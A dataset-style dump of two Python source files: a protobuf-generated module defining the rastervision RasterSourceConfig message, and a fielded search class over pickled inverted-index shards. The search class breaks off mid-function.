text
stringlengths 3
1.05M
|
|---|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: rastervision/protos/raster_source.proto
# NOTE(review): machine-generated proto2 module defining the RasterSourceConfig
# message and its nested types. Regenerate with protoc instead of hand-editing:
# the serialized_pb byte string and every serialized_start/serialized_end offset
# below must stay mutually consistent.
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)

_sym_db = _symbol_database.Default()

from google.protobuf import struct_pb2 as google_dot_protobuf_dot_struct__pb2
from rastervision.protos import raster_transformer_pb2 as rastervision_dot_protos_dot_raster__transformer__pb2
from rastervision.protos import vector_source_pb2 as rastervision_dot_protos_dot_vector__source__pb2

# File-level descriptor: carries the serialized FileDescriptorProto for
# raster_source.proto plus the descriptors of its three imports.
DESCRIPTOR = _descriptor.FileDescriptor(
  name='rastervision/protos/raster_source.proto',
  package='rv.protos',
  syntax='proto2',
  serialized_pb=_b('\n\'rastervision/protos/raster_source.proto\x12\trv.protos\x1a\x1cgoogle/protobuf/struct.proto\x1a,rastervision/protos/raster_transformer.proto\x1a\'rastervision/protos/vector_source.proto\"\xf5\x07\n\x12RasterSourceConfig\x12\x13\n\x0bsource_type\x18\x01 \x02(\t\x12\x38\n\x0ctransformers\x18\x02 \x03(\x0b\x32\".rv.protos.RasterTransformerConfig\x12\x15\n\rchannel_order\x18\x03 \x03(\x05\x12\x43\n\rgeotiff_files\x18\x04 \x01(\x0b\x32*.rv.protos.RasterSourceConfig.GeoTiffFilesH\x00\x12=\n\nimage_file\x18\x05 \x01(\x0b\x32\'.rv.protos.RasterSourceConfig.ImageFileH\x00\x12\x41\n\x0cgeojson_file\x18\x06 \x01(\x0b\x32).rv.protos.RasterSourceConfig.GeoJSONFileH\x00\x12\x30\n\rcustom_config\x18\x07 \x01(\x0b\x32\x17.google.protobuf.StructH\x00\x12K\n\x11rasterized_source\x18\x08 \x01(\x0b\x32..rv.protos.RasterSourceConfig.RasterizedSourceH\x00\x1aL\n\x0cGeoTiffFiles\x12\x0c\n\x04uris\x18\x01 \x03(\t\x12\x16\n\x0ex_shift_meters\x18\x02 \x01(\x02\x12\x16\n\x0ey_shift_meters\x18\x03 \x01(\x02\x1a\x18\n\tImageFile\x12\x0b\n\x03uri\x18\x01 \x02(\t\x1a\xf1\x01\n\x10RasterizedSource\x12\x34\n\rvector_source\x18\x01 \x02(\x0b\x32\x1d.rv.protos.VectorSourceConfig\x12\\\n\x12rasterizer_options\x18\x02 \x02(\x0b\x32@.rv.protos.RasterSourceConfig.RasterizedSource.RasterizerOptions\x1aI\n\x11RasterizerOptions\x12\x1b\n\x13\x62\x61\x63kground_class_id\x18\x02 \x02(\x05\x12\x17\n\x0bline_buffer\x18\x03 \x01(\x05:\x02\x31\x35\x1a\xbe\x01\n\x0bGeoJSONFile\x12\x0b\n\x03uri\x18\x01 \x02(\t\x12W\n\x12rasterizer_options\x18\x02 \x02(\x0b\x32;.rv.protos.RasterSourceConfig.GeoJSONFile.RasterizerOptions\x1aI\n\x11RasterizerOptions\x12\x1b\n\x13\x62\x61\x63kground_class_id\x18\x02 \x02(\x05\x12\x17\n\x0bline_buffer\x18\x03 \x01(\x05:\x02\x31\x35\x42\x16\n\x14raster_source_config')
  ,
  dependencies=[google_dot_protobuf_dot_struct__pb2.DESCRIPTOR,rastervision_dot_protos_dot_raster__transformer__pb2.DESCRIPTOR,rastervision_dot_protos_dot_vector__source__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)

# Descriptor for nested message RasterSourceConfig.GeoTiffFiles:
# repeated string uris, optional float x/y_shift_meters.
_RASTERSOURCECONFIG_GEOTIFFFILES = _descriptor.Descriptor(
  name='GeoTiffFiles',
  full_name='rv.protos.RasterSourceConfig.GeoTiffFiles',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='uris', full_name='rv.protos.RasterSourceConfig.GeoTiffFiles.uris', index=0,
      number=1, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='x_shift_meters', full_name='rv.protos.RasterSourceConfig.GeoTiffFiles.x_shift_meters', index=1,
      number=2, type=2, cpp_type=6, label=1,
      has_default_value=False, default_value=float(0),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='y_shift_meters', full_name='rv.protos.RasterSourceConfig.GeoTiffFiles.y_shift_meters', index=2,
      number=3, type=2, cpp_type=6, label=1,
      has_default_value=False, default_value=float(0),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=622,
  serialized_end=698,
)

# Descriptor for nested message RasterSourceConfig.ImageFile: required string uri.
_RASTERSOURCECONFIG_IMAGEFILE = _descriptor.Descriptor(
  name='ImageFile',
  full_name='rv.protos.RasterSourceConfig.ImageFile',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='uri', full_name='rv.protos.RasterSourceConfig.ImageFile.uri', index=0,
      number=1, type=9, cpp_type=9, label=2,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=700,
  serialized_end=724,
)

# Descriptor for RasterSourceConfig.RasterizedSource.RasterizerOptions:
# required int32 background_class_id, optional int32 line_buffer (default 15).
_RASTERSOURCECONFIG_RASTERIZEDSOURCE_RASTERIZEROPTIONS = _descriptor.Descriptor(
  name='RasterizerOptions',
  full_name='rv.protos.RasterSourceConfig.RasterizedSource.RasterizerOptions',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='background_class_id', full_name='rv.protos.RasterSourceConfig.RasterizedSource.RasterizerOptions.background_class_id', index=0,
      number=2, type=5, cpp_type=1, label=2,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='line_buffer', full_name='rv.protos.RasterSourceConfig.RasterizedSource.RasterizerOptions.line_buffer', index=1,
      number=3, type=5, cpp_type=1, label=1,
      has_default_value=True, default_value=15,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=895,
  serialized_end=968,
)

# Descriptor for RasterSourceConfig.RasterizedSource:
# required VectorSourceConfig vector_source + required RasterizerOptions.
_RASTERSOURCECONFIG_RASTERIZEDSOURCE = _descriptor.Descriptor(
  name='RasterizedSource',
  full_name='rv.protos.RasterSourceConfig.RasterizedSource',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='vector_source', full_name='rv.protos.RasterSourceConfig.RasterizedSource.vector_source', index=0,
      number=1, type=11, cpp_type=10, label=2,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='rasterizer_options', full_name='rv.protos.RasterSourceConfig.RasterizedSource.rasterizer_options', index=1,
      number=2, type=11, cpp_type=10, label=2,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[_RASTERSOURCECONFIG_RASTERIZEDSOURCE_RASTERIZEROPTIONS, ],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=727,
  serialized_end=968,
)

# Descriptor for RasterSourceConfig.GeoJSONFile.RasterizerOptions — same shape
# as the RasterizedSource variant above (separate nested type in the .proto).
_RASTERSOURCECONFIG_GEOJSONFILE_RASTERIZEROPTIONS = _descriptor.Descriptor(
  name='RasterizerOptions',
  full_name='rv.protos.RasterSourceConfig.GeoJSONFile.RasterizerOptions',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='background_class_id', full_name='rv.protos.RasterSourceConfig.GeoJSONFile.RasterizerOptions.background_class_id', index=0,
      number=2, type=5, cpp_type=1, label=2,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='line_buffer', full_name='rv.protos.RasterSourceConfig.GeoJSONFile.RasterizerOptions.line_buffer', index=1,
      number=3, type=5, cpp_type=1, label=1,
      has_default_value=True, default_value=15,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=895,
  serialized_end=968,
)

# Descriptor for RasterSourceConfig.GeoJSONFile:
# required string uri + required RasterizerOptions.
_RASTERSOURCECONFIG_GEOJSONFILE = _descriptor.Descriptor(
  name='GeoJSONFile',
  full_name='rv.protos.RasterSourceConfig.GeoJSONFile',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='uri', full_name='rv.protos.RasterSourceConfig.GeoJSONFile.uri', index=0,
      number=1, type=9, cpp_type=9, label=2,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='rasterizer_options', full_name='rv.protos.RasterSourceConfig.GeoJSONFile.rasterizer_options', index=1,
      number=2, type=11, cpp_type=10, label=2,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[_RASTERSOURCECONFIG_GEOJSONFILE_RASTERIZEROPTIONS, ],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=971,
  serialized_end=1161,
)

# Top-level message RasterSourceConfig: required source_type, repeated
# transformers/channel_order, and a 'raster_source_config' oneof holding one of
# geotiff_files / image_file / geojson_file / custom_config / rasterized_source.
_RASTERSOURCECONFIG = _descriptor.Descriptor(
  name='RasterSourceConfig',
  full_name='rv.protos.RasterSourceConfig',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='source_type', full_name='rv.protos.RasterSourceConfig.source_type', index=0,
      number=1, type=9, cpp_type=9, label=2,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='transformers', full_name='rv.protos.RasterSourceConfig.transformers', index=1,
      number=2, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='channel_order', full_name='rv.protos.RasterSourceConfig.channel_order', index=2,
      number=3, type=5, cpp_type=1, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='geotiff_files', full_name='rv.protos.RasterSourceConfig.geotiff_files', index=3,
      number=4, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='image_file', full_name='rv.protos.RasterSourceConfig.image_file', index=4,
      number=5, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='geojson_file', full_name='rv.protos.RasterSourceConfig.geojson_file', index=5,
      number=6, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='custom_config', full_name='rv.protos.RasterSourceConfig.custom_config', index=6,
      number=7, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='rasterized_source', full_name='rv.protos.RasterSourceConfig.rasterized_source', index=7,
      number=8, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[_RASTERSOURCECONFIG_GEOTIFFFILES, _RASTERSOURCECONFIG_IMAGEFILE, _RASTERSOURCECONFIG_RASTERIZEDSOURCE, _RASTERSOURCECONFIG_GEOJSONFILE, ],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
    _descriptor.OneofDescriptor(
      name='raster_source_config', full_name='rv.protos.RasterSourceConfig.raster_source_config',
      index=0, containing_type=None, fields=[]),
  ],
  serialized_start=172,
  serialized_end=1185,
)

# Cross-link the descriptors: containing types, message-typed fields, and the
# oneof membership (all five alternative source fields share one oneof).
_RASTERSOURCECONFIG_GEOTIFFFILES.containing_type = _RASTERSOURCECONFIG
_RASTERSOURCECONFIG_IMAGEFILE.containing_type = _RASTERSOURCECONFIG
_RASTERSOURCECONFIG_RASTERIZEDSOURCE_RASTERIZEROPTIONS.containing_type = _RASTERSOURCECONFIG_RASTERIZEDSOURCE
_RASTERSOURCECONFIG_RASTERIZEDSOURCE.fields_by_name['vector_source'].message_type = rastervision_dot_protos_dot_vector__source__pb2._VECTORSOURCECONFIG
_RASTERSOURCECONFIG_RASTERIZEDSOURCE.fields_by_name['rasterizer_options'].message_type = _RASTERSOURCECONFIG_RASTERIZEDSOURCE_RASTERIZEROPTIONS
_RASTERSOURCECONFIG_RASTERIZEDSOURCE.containing_type = _RASTERSOURCECONFIG
_RASTERSOURCECONFIG_GEOJSONFILE_RASTERIZEROPTIONS.containing_type = _RASTERSOURCECONFIG_GEOJSONFILE
_RASTERSOURCECONFIG_GEOJSONFILE.fields_by_name['rasterizer_options'].message_type = _RASTERSOURCECONFIG_GEOJSONFILE_RASTERIZEROPTIONS
_RASTERSOURCECONFIG_GEOJSONFILE.containing_type = _RASTERSOURCECONFIG
_RASTERSOURCECONFIG.fields_by_name['transformers'].message_type = rastervision_dot_protos_dot_raster__transformer__pb2._RASTERTRANSFORMERCONFIG
_RASTERSOURCECONFIG.fields_by_name['geotiff_files'].message_type = _RASTERSOURCECONFIG_GEOTIFFFILES
_RASTERSOURCECONFIG.fields_by_name['image_file'].message_type = _RASTERSOURCECONFIG_IMAGEFILE
_RASTERSOURCECONFIG.fields_by_name['geojson_file'].message_type = _RASTERSOURCECONFIG_GEOJSONFILE
_RASTERSOURCECONFIG.fields_by_name['custom_config'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_RASTERSOURCECONFIG.fields_by_name['rasterized_source'].message_type = _RASTERSOURCECONFIG_RASTERIZEDSOURCE
_RASTERSOURCECONFIG.oneofs_by_name['raster_source_config'].fields.append(
  _RASTERSOURCECONFIG.fields_by_name['geotiff_files'])
_RASTERSOURCECONFIG.fields_by_name['geotiff_files'].containing_oneof = _RASTERSOURCECONFIG.oneofs_by_name['raster_source_config']
_RASTERSOURCECONFIG.oneofs_by_name['raster_source_config'].fields.append(
  _RASTERSOURCECONFIG.fields_by_name['image_file'])
_RASTERSOURCECONFIG.fields_by_name['image_file'].containing_oneof = _RASTERSOURCECONFIG.oneofs_by_name['raster_source_config']
_RASTERSOURCECONFIG.oneofs_by_name['raster_source_config'].fields.append(
  _RASTERSOURCECONFIG.fields_by_name['geojson_file'])
_RASTERSOURCECONFIG.fields_by_name['geojson_file'].containing_oneof = _RASTERSOURCECONFIG.oneofs_by_name['raster_source_config']
_RASTERSOURCECONFIG.oneofs_by_name['raster_source_config'].fields.append(
  _RASTERSOURCECONFIG.fields_by_name['custom_config'])
_RASTERSOURCECONFIG.fields_by_name['custom_config'].containing_oneof = _RASTERSOURCECONFIG.oneofs_by_name['raster_source_config']
_RASTERSOURCECONFIG.oneofs_by_name['raster_source_config'].fields.append(
  _RASTERSOURCECONFIG.fields_by_name['rasterized_source'])
_RASTERSOURCECONFIG.fields_by_name['rasterized_source'].containing_oneof = _RASTERSOURCECONFIG.oneofs_by_name['raster_source_config']
DESCRIPTOR.message_types_by_name['RasterSourceConfig'] = _RASTERSOURCECONFIG

# Build the concrete message classes from the descriptors (nested classes for
# each nested message) and register them with the symbol database.
RasterSourceConfig = _reflection.GeneratedProtocolMessageType('RasterSourceConfig', (_message.Message,), dict(

  GeoTiffFiles = _reflection.GeneratedProtocolMessageType('GeoTiffFiles', (_message.Message,), dict(
    DESCRIPTOR = _RASTERSOURCECONFIG_GEOTIFFFILES,
    __module__ = 'rastervision.protos.raster_source_pb2'
    # @@protoc_insertion_point(class_scope:rv.protos.RasterSourceConfig.GeoTiffFiles)
    ))
  ,

  ImageFile = _reflection.GeneratedProtocolMessageType('ImageFile', (_message.Message,), dict(
    DESCRIPTOR = _RASTERSOURCECONFIG_IMAGEFILE,
    __module__ = 'rastervision.protos.raster_source_pb2'
    # @@protoc_insertion_point(class_scope:rv.protos.RasterSourceConfig.ImageFile)
    ))
  ,

  RasterizedSource = _reflection.GeneratedProtocolMessageType('RasterizedSource', (_message.Message,), dict(

    RasterizerOptions = _reflection.GeneratedProtocolMessageType('RasterizerOptions', (_message.Message,), dict(
      DESCRIPTOR = _RASTERSOURCECONFIG_RASTERIZEDSOURCE_RASTERIZEROPTIONS,
      __module__ = 'rastervision.protos.raster_source_pb2'
      # @@protoc_insertion_point(class_scope:rv.protos.RasterSourceConfig.RasterizedSource.RasterizerOptions)
      ))
    ,
    DESCRIPTOR = _RASTERSOURCECONFIG_RASTERIZEDSOURCE,
    __module__ = 'rastervision.protos.raster_source_pb2'
    # @@protoc_insertion_point(class_scope:rv.protos.RasterSourceConfig.RasterizedSource)
    ))
  ,

  GeoJSONFile = _reflection.GeneratedProtocolMessageType('GeoJSONFile', (_message.Message,), dict(

    RasterizerOptions = _reflection.GeneratedProtocolMessageType('RasterizerOptions', (_message.Message,), dict(
      DESCRIPTOR = _RASTERSOURCECONFIG_GEOJSONFILE_RASTERIZEROPTIONS,
      __module__ = 'rastervision.protos.raster_source_pb2'
      # @@protoc_insertion_point(class_scope:rv.protos.RasterSourceConfig.GeoJSONFile.RasterizerOptions)
      ))
    ,
    DESCRIPTOR = _RASTERSOURCECONFIG_GEOJSONFILE,
    __module__ = 'rastervision.protos.raster_source_pb2'
    # @@protoc_insertion_point(class_scope:rv.protos.RasterSourceConfig.GeoJSONFile)
    ))
  ,
  DESCRIPTOR = _RASTERSOURCECONFIG,
  __module__ = 'rastervision.protos.raster_source_pb2'
  # @@protoc_insertion_point(class_scope:rv.protos.RasterSourceConfig)
  ))
_sym_db.RegisterMessage(RasterSourceConfig)
_sym_db.RegisterMessage(RasterSourceConfig.GeoTiffFiles)
_sym_db.RegisterMessage(RasterSourceConfig.ImageFile)
_sym_db.RegisterMessage(RasterSourceConfig.RasterizedSource)
_sym_db.RegisterMessage(RasterSourceConfig.RasterizedSource.RasterizerOptions)
_sym_db.RegisterMessage(RasterSourceConfig.GeoJSONFile)
_sym_db.RegisterMessage(RasterSourceConfig.GeoJSONFile.RasterizerOptions)

# @@protoc_insertion_point(module_scope)
|
# KINDS
# -----
# 0 - docID
# 1 - title
# 2 - infobox
# 3 - references
# 4 - category
# 5 - links
# 6 - body
import pickle, os
class search ():
def __init__ (self, path_to_index_file, stemmer, stopwords):
self.path_to_index_file = path_to_index_file
self.stemmer = stemmer
self.stopwords = stopwords
self.weights = [None, 2000, 500, 80, 40, 10, 150]
# self.weights = [None, 2000, 300, 10, 40, 10, 100]
def apply_process (self, lines, query_term):
for line in lines:
j = line[2:line.find('[')]
j = j[:j.find('\'')]
if j == query_term:
return True
return False
def intersection (self, list1, list2):
temp = set (list(zip(*list2))[0])
list3 = [x[0] for x in list1 if x[0] in temp]
return list3
def list_intersection (self, lst1, lst2):
lst3 = [value for value in lst1 if value in lst2]
return lst3
def process_query (self, query):
self.query = query.lower()
self.terms_in_query = self.query.split(' ')
self.terms_in_query = [x.strip() for x in self.terms_in_query]
self.terms_in_query = [self.stemmer.stem(x) for x in self.terms_in_query if not self.stopwords.check_stopword(x)]
self.final_list = []
def field_query (self, query):
    """Answer a fielded query such as "title:gandhi body:india".

    For each field tag present in the query (title:, infobox:, ref:,
    category:, links:, body:) the tagged terms are extracted, looked up in the
    per-field posting lists, and the surviving doc-ID lists are intersected.
    Returns a list of up to 10 document titles, padded with '.' entries.

    NOTE(review): posting-list entries are indexed as x[0]=docID and
    x[1]..x[6] as per-field frequencies matching the KIND legend and
    self.weights — presumably; confirm against the indexer.
    NOTE(review): index files opened below are never closed (resource leak),
    and fields[1] is set for every field tag (fields[k] was probably meant);
    behavior preserved as-is.
    """
    fields = [None, 0, 0, 0, 0, 0, 0]
    title = None
    infobox = None
    references = None
    category = None
    links = None
    body = None
    final_list = []
    lists = []
    _of_document_titles = []
    # --- Extract the term list for each field tag present in the query. ---
    # Each block slices from "<tag>:" up to the next ':' (if any), splits on
    # spaces, then strips stray occurrences of the other tag names.
    if "title" in query:
        fields[1] = 1
        title = query[query.find("title:")+6:]
        if ":" in title:
            title = title[:title.find(":")]
        title = title.split(' ')
        if "body" in title:
            title.remove("body")
        if "infobox" in title:
            title.remove("infobox")
        if "ref" in title:
            title.remove("ref")
        if "category" in title:
            title.remove("category")
        if "links" in title:
            title.remove("links")
    if "infobox" in query:
        fields[1] = 1
        infobox = query[query.find("infobox:")+8:]
        if ":" in infobox:
            infobox = infobox[:infobox.find(":")]
        infobox = infobox.split(' ')
        if "body" in infobox:
            infobox.remove("body")
        if "title" in infobox:
            infobox.remove("title")
        if "ref" in infobox:
            infobox.remove("ref")
        if "category" in infobox:
            infobox.remove("category")
        if "links" in infobox:
            infobox.remove("links")
    if "ref" in query:
        fields[1] = 1
        references = query[query.find("ref:")+4:]
        if ":" in references:
            references = references[:references.find(":")]
        references = references.split(' ')
        if "body" in references:
            references.remove("body")
        if "title" in references:
            references.remove("title")
        if "infobox" in references:
            references.remove("infobox")
        if "category" in references:
            references.remove("category")
        if "links" in references:
            references.remove("links")
    if "category" in query:
        fields[1] = 1
        category = query[query.find("category:")+9:]
        if ":" in category:
            category = category[:category.find(":")]
        category = category.split(' ')
        if "body" in category:
            category.remove("body")
        if "title" in category:
            category.remove("title")
        if "infobox" in category:
            category.remove("infobox")
        if "ref" in category:
            category.remove("ref")
        if "links" in category:
            category.remove("links")
    if "links" in query:
        fields[1] = 1
        links = query[query.find("links:")+6:]
        if ":" in links:
            links = links[:links.find(":")]
        links = links.split(' ')
        if "body" in links:
            links.remove("body")
        if "title" in links:
            links.remove("title")
        if "infobox" in links:
            links.remove("infobox")
        if "ref" in links:
            links.remove("ref")
        if "category" in links:
            links.remove("category")
    if "body" in query:
        fields[1] = 1
        body = query[query.find("body:")+5:]
        if ":" in body:
            body = body[:body.find(":")]
        body = body.split(' ')
        if "links" in body:
            body.remove("links")
        if "title" in body:
            body.remove("title")
        if "infobox" in body:
            body.remove("infobox")
        if "ref" in body:
            body.remove("ref")
        if "category" in body:
            body.remove("category")
    print (title)
    print (body)
    # --- Title lookup. Single-term: load the shard keyed by the term's first
    # two characters, filter postings with a positive title count (x[1]),
    # sort by weighted relevance; no hit returns ten '.' placeholders.
    # Multi-term: intersect posting lists into self.final_list.
    # NOTE(review): with exactly one surviving posting list,
    # posting_lists[1] below raises IndexError; unchanged here.
    if title is not None:
        if len (title) == 1:
            index_file_name = os.path.join ('../output/' + 'index_' + str(title[0][0]) + str(title[0][1]))
            index_file = open (index_file_name, 'rb')
            index = {}
            index = pickle.load (index_file)
            if title[0] in index:
                final_list = index[title[0]]
                final_list = [x for x in final_list if x[1] > 0]
                final_list.sort (reverse=True, key=lambda x: self.weights[1] * x[1] + self.weights[2] * x[2] + self.weights[3] * x[3] + self.weights[4] * x[4] + self.weights[5] * x[5]+ self.weights[6] * x[6]) # relevance !CHANGE
            if len(final_list) == 0:
                final_list = ['.'] * 10
                return final_list
            else:
                # keep only the docID column
                final_list = list(zip(*final_list))[0]
        else:
            posting_lists = []
            for term in title:
                index_file_name = os.path.join ('../output/' + 'index_' + str(term[0]) + str(term[1]))
                index_file = open (index_file_name, 'rb')
                index = {}
                index = pickle.load (index_file)
                if term in index:
                    temp_list = index[term]
                    temp_list = [x for x in temp_list if x[1] > 0]
                    posting_lists.append (temp_list)
            # shortest list first so the seed intersection is smallest
            posting_lists.sort (key=len)
            number_of_posting_lists = len(posting_lists)
            if number_of_posting_lists > 0:
                self.final_list = self.intersection (posting_lists[0], posting_lists[1])
            else:
                self.final_list = posting_lists
            for i in range (1, number_of_posting_lists-1):
                if len (self.final_list) < len (posting_lists[i]):
                    self.final_list = self.intersection (self.final_list, posting_lists[i])
                else:
                    self.final_list = self.intersection (posting_lists[i], self.final_list)
    if len(final_list) > 0:
        # NOTE(review): appended twice in the original; preserved as-is.
        lists.append ([x for x in final_list])
        lists.append ([x for x in final_list])
    final_list = []
    # --- Infobox lookup (same shape as title; filters on x[2]). ---
    if infobox is not None:
        if len (infobox) == 1:
            index_file_name = os.path.join ('../output/' + 'index_' + str(infobox[0][0]) + str(infobox[0][1]))
            index_file = open (index_file_name, 'rb')
            index = {}
            index = pickle.load (index_file)
            if infobox[0] in index:
                final_list = index[infobox[0]]
                final_list = [x for x in final_list if x[2] > 0]
                final_list.sort (reverse=True, key=lambda x: self.weights[1] * x[1] + self.weights[2] * x[2] + self.weights[3] * x[3] + self.weights[4] * x[4] + self.weights[5] * x[5]+ self.weights[6] * x[6]) # relevance !CHANGE
            if len(final_list) == 0:
                final_list = ['.'] * 10
                return final_list
            else:
                final_list = list(zip(*final_list))[0]
        else:
            posting_lists = []
            for term in infobox:
                index_file_name = os.path.join ('../output/' + 'index_' + str(term[0]) + str(term[1]))
                index_file = open (index_file_name, 'rb')
                index = {}
                index = pickle.load (index_file)
                if term in index:
                    temp_list = index[term]
                    temp_list = [x for x in temp_list if x[2] > 0]
                    posting_lists.append (temp_list)
            posting_lists.sort (key=len)
            number_of_posting_lists = len(posting_lists)
            if number_of_posting_lists > 0:
                self.final_list = self.intersection (posting_lists[0], posting_lists[1])
            else:
                self.final_list = posting_lists
            for i in range (1, number_of_posting_lists-1):
                if len (self.final_list) < len (posting_lists[i]):
                    self.final_list = self.intersection (self.final_list, posting_lists[i])
                else:
                    self.final_list = self.intersection (posting_lists[i], self.final_list)
    if len(final_list) > 0:
        lists.append ([x for x in final_list])
        lists.append ([x for x in final_list])
    final_list = []
    # --- References lookup (filters on x[3]). ---
    if references is not None:
        if len (references) == 1:
            index_file_name = os.path.join ('../output/' + 'index_' + str(references[0][0]) + str(references[0][1]))
            index_file = open (index_file_name, 'rb')
            index = {}
            index = pickle.load (index_file)
            if references[0] in index:
                final_list = index[references[0]]
                final_list = [x for x in final_list if x[3] > 0]
                final_list.sort (reverse=True, key=lambda x: self.weights[1] * x[1] + self.weights[2] * x[2] + self.weights[3] * x[3] + self.weights[4] * x[4] + self.weights[5] * x[5]+ self.weights[6] * x[6]) # relevance !CHANGE
            if len(final_list) == 0:
                final_list = ['.'] * 10
                return final_list
            else:
                final_list = list(zip(*final_list))[0]
        else:
            posting_lists = []
            for term in references:
                index_file_name = os.path.join ('../output/' + 'index_' + str(term[0]) + str(term[1]))
                index_file = open (index_file_name, 'rb')
                index = {}
                index = pickle.load (index_file)
                if term in index:
                    temp_list = index[term]
                    temp_list = [x for x in temp_list if x[3] > 0]
                    posting_lists.append (temp_list)
            posting_lists.sort (key=len)
            number_of_posting_lists = len(posting_lists)
            if number_of_posting_lists > 0:
                self.final_list = self.intersection (posting_lists[0], posting_lists[1])
            else:
                self.final_list = posting_lists
            for i in range (1, number_of_posting_lists-1):
                if len (self.final_list) < len (posting_lists[i]):
                    self.final_list = self.intersection (self.final_list, posting_lists[i])
                else:
                    self.final_list = self.intersection (posting_lists[i], self.final_list)
    if len(final_list) > 0:
        lists.append ([x for x in final_list])
        lists.append ([x for x in final_list])
    final_list = []
    # --- Category lookup (filters on x[4]). ---
    if category is not None:
        if len (category) == 1:
            index_file_name = os.path.join ('../output/' + 'index_' + str(category[0][0]) + str(category[0][1]))
            index_file = open (index_file_name, 'rb')
            index = {}
            index = pickle.load (index_file)
            if category[0] in index:
                final_list = index[category[0]]
                final_list = [x for x in final_list if x[4] > 0]
